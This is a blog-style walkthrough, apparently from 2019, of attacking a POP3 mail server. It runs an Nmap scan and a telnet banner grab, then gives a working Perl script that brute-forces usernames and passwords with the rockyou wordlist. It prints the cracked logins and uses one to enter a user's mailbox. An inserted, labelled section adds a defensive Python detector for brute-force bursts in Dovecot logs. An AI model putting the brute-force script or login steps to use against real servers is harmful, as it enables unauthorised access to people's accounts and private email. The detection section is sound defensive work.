Monday, September 23, 2019

Exploring POP3 Servers

Scanning the remote host

We can use Nmap to scan the remote host, running its default scripts (-sC) and version detection (-sV) against the POP3 port.

root@asus:~/unix% nmap -p 110 -sC -sV 148.32.42.5

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-23 14:33 MDT
Nmap scan report for mail.acme.com (148.32.42.5)
Host is up (0.00018s latency).
PORT    STATE SERVICE VERSION
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP AUTH-RESP-CODE USER CAPA UIDL SASL(PLAIN) RESP-CODES

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds
root@asus:~/unix% 

Once we have verified that the remote host is running a POP3 service, we can move on to connecting to it. For this we can use telnet.

root@asus:~/unix% telnet 148.32.42.5 110
Trying 148.32.42.5...
Connected to 148.32.42.5.
Escape character is '^]'.
+OK Dovecot ready.
QUIT
+OK Logging out
Connection closed by foreign host.
root@asus:~/unix%

We were able to successfully connect to the remote host. We also get the POP3 banner, 'Dovecot', which tells us which server software is running.

Finding valid POP3 logins

Our next step is to use a brute-force attack against the POP3 server to find valid user/pass combinations to log in with. For this we can write a small Perl script that tries a list of common first names as usernames and the rockyou wordlist as passwords.

#!/usr/bin/env perl
use strict;
use warnings;
use Net::POP3;

my $pop3 = Net::POP3->new('mail.acme.com');

my @userlist = file2array('common-names.txt');
my @passlist = file2array('rockyou.txt');

print "[*] Searching for valid POP3 logins...\n";

foreach my $user (@userlist) {
    foreach my $pass (@passlist) {        
        if ($pop3->login($user,$pass)) {
            print "[+] Found Login: $user:$pass\n";            
        }
    }
    sleep 1;
}
$pop3->quit;

sub file2array {
    my $file = shift;
    my @array;

    open(my $fh, '<', $file) or die $!;

    while (<$fh>) {
        chomp($_);
        push(@array, $_);
    }

    close($fh) or die $!;
    
    return @array;    
}

If we run the script...

root@asus:~/unix% perl pop3.pl
[*] Searching for valid POP3 logins...
[+] Found Login: clare:jessica
[+] Found Login: vance:654321
[+] Found Login: sasha:michael
[+] Found Login: hayden:qwerty
root@asus:~/unix%
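
On the server side, a run like the one above appears in Dovecot's pop3-login log as a burst of failed authentications from one address across many usernames, followed by a successful login. The following is an added example, not part of the original post: it counts failures per source IP and flags logins that succeed after such a burst. The log lines are constructed samples and the thresholds are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in Dovecot's pop3-login syslog style (not from the post).
SAMPLE_LOG = """\
Sep 23 14:40:01 mail dovecot: pop3-login: Disconnected (auth failed, 3 attempts in 6 secs): user=<aaron>, method=PLAIN, rip=198.51.100.23, lip=148.32.42.5
Sep 23 14:40:09 mail dovecot: pop3-login: Aborted login (auth failed, 3 attempts in 7 secs): user=<abby>, method=PLAIN, rip=198.51.100.23, lip=148.32.42.5
Sep 23 14:40:12 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<hayden>, method=PLAIN, rip=203.0.113.9, lip=148.32.42.5
Sep 23 14:40:15 mail dovecot: pop3-login: Disconnected (auth failed, 2 attempts in 4 secs): user=<clare>, method=PLAIN, rip=198.51.100.23, lip=148.32.42.5
Sep 23 14:40:18 mail dovecot: pop3-login: Login: user=<clare>, method=PLAIN, rip=198.51.100.23, lip=148.32.42.5, mpid=4242
Sep 23 14:40:30 mail dovecot: pop3-login: Login: user=<hayden>, method=PLAIN, rip=203.0.113.9, lip=148.32.42.5, mpid=4250
"""

# Matches successful logins and disconnects that carry an "auth failed" counter.
EVENT = re.compile(
    r"pop3-login: (?P<kind>Login|Disconnected|Aborted login)"
    r"(?: \(auth failed, (?P<n>\d+) attempts in \d+ secs\))?"
    r": user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[0-9a-fA-F.:]+)"
)

def analyze(log_text, max_failures=5, max_users=3):
    """Return noisy source IPs and logins that succeeded after a failure burst.

    max_failures and max_users are assumed thresholds; tune them per site.
    """
    failures = defaultdict(int)   # rip -> total failed attempts
    users = defaultdict(set)      # rip -> distinct usernames that failed
    suspect_logins = []

    def noisy(rip):
        return failures[rip] >= max_failures or len(users[rip]) >= max_users

    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue
        rip, user = m["rip"], m["user"]
        if m["n"]:                                  # failed authentication
            failures[rip] += int(m["n"])
            users[rip].add(user)
        elif m["kind"] == "Login" and noisy(rip):   # success after a burst
            suspect_logins.append((rip, user))

    sources = {ip: (failures[ip], len(users[ip])) for ip in list(failures) if noisy(ip)}
    return {"sources": sources, "suspect_logins": suspect_logins}

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

An account listed under suspect_logins should have its password reset, and the source address is a candidate for blocking or rate limiting.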

Logging in to the POP3 server

Now that we have some valid POP3 logins, we can connect to the server, log in with one of our user/pass combos, and browse the user's inbox.

root@asus:~% telnet 148.32.42.5 110
Trying 148.32.42.5...
Connected to 148.32.42.5.
Escape character is '^]'.
+OK Dovecot ready.
USER clare
+OK
PASS jessica
+OK Logged in.
LIST
+OK 0 messages:
.
QUIT
+OK Logging out.
Connection closed by foreign host.
root@asus:~%
